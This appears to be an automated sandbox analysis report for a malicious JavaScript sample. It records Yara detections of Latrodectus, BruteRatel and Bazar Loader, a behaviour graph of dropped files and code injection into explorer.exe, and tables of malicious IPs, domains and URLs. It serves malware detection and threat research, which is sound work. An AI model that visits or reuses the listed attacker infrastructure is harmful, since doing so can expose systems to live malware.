Source: Yara match File source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected BruteRatel
Source: Yara match File source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
Source: Yara match File source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected Latrodectus
Source: Yara match File source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Bazar Loader
Source: Yara match File source: 6.2.rundll32.exe.1ff4b020000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.1ff4b0a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3332247627.000001FF4B020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3332368718.000001FF4B0A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected BruteRatel
Source: Yara match File source: 00000006.00000003.2444968399.000001FF4CA6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR
Source: Yara match File source: 00000006.00000002.3332076257.000001FF4AE58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Yara detected Latrodectus
Source: Yara match File source: 00000008.00000002.3353267482.000000000E6CB000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525184 Sample: Document-18-33-08.js Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 39 tiguanin.com 2->39 41 isomicrotich.com 2->41 43 2 other IPs or domains 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Yara detected Latrodectus 2->57 59 9 other signatures 2->59 10 msiexec.exe 14 38 2->10         started        15 wscript.exe 1 2->15         started        signatures3 process4 dnsIp5 49 188.119.112.7, 49704, 80 SERVERIUS-ASNL Russian Federation 10->49 31 C:\Windows\Installer\MSIF29D.tmp, PE32 10->31 dropped 33 C:\Users\user\AppData\...\vierm_soft_x64.dll, PE32+ 10->33 dropped 35 C:\Windows\Installer\MSIF1DF.tmp, PE32 10->35 dropped 37 3 other files (none is malicious) 10->37 dropped 69 Drops executables to the windows directory (C:\Windows) and starts them 10->69 17 MSIF29D.tmp 1 10->17         started        19 msiexec.exe 10->19         started        71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->71 file6 signatures7 process8 process9 21 rundll32.exe 17->21         started        process10 23 rundll32.exe 8 12 21->23         started        dnsIp11 45 greshunka.com 82.115.223.39, 49708, 49875, 49938 MIDNET-ASTK-TelecomRU Russian Federation 23->45 47 bazarunet.com 80.78.24.30, 49705, 49706, 49707 CYBERDYNELR Cyprus 23->47 61 System process connects to network (likely due to code injection or exploit) 23->61 63 Contains functionality to inject threads in other processes 23->63 65 Injects code into the Windows Explorer (explorer.exe) 23->65 67 5 other signatures 23->67 27 explorer.exe 58 1 23->27 injected signatures12 process13 dnsIp14 51 isomicrotich.com 188.114.96.3, 443, 50048, 50050 CLOUDFLARENETUS European Union 27->51 73 System process connects to network (likely due to code injection or exploit) 27->73 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.119.112.7
 unknown Russian Federation
50673 SERVERIUS-ASNL false
188.114.96.3
 isomicrotich.com European Union
13335 CLOUDFLARENETUS true
82.115.223.39
 greshunka.com Russian Federation
209821 MIDNET-ASTK-TelecomRU true
80.78.24.30
 tiguanin.com Cyprus
37560 CYBERDYNELR true

Contacted Domains

Name IP Active
isomicrotich.com 188.114.96.3 true
greshunka.com 82.115.223.39 true
tiguanin.com 80.78.24.30 true
bazarunet.com 80.78.24.30 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://opewolumeras.com/test/ true
    		unknown
    https://isomicrotich.com/test/ true
      		unknown